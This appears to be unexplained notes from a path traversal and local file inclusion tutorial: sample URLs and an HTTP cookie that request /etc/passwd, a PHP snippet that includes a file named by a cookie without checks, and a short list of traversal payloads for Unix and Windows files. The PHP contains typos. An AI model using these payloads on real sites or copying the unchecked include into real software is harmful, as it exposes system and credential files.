https://www.vulnerable-site.com/images?filename=cat.png
https://www.vulnerable-site.com/images?filename=/etc/passwd
<?php
$template = 'blue.php';
if ( is_set( $_COOKIE['TEMPLATE'] ) )
$template = $_COOKIE['TEMPLATE’];
include ( "/home/users/phpguru/templates/" . $template );
?>
GET /vulnerable.php HTTP/1.0
Cookie: TEMPLATE=../../../../../../../../../etc/passwd
...
../../../../../../etc/passwd
.\\..\\..\\..\\..\\..\\windows\\win.ini
/etc/passwwd
C:\\Windows\\System32\\XYZ.txt